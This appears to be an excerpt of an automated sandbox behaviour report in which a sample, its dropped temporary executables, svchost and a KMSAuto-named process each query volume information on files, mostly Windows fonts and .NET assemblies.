                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeQueries volume information: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                      Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe VolumeInformation
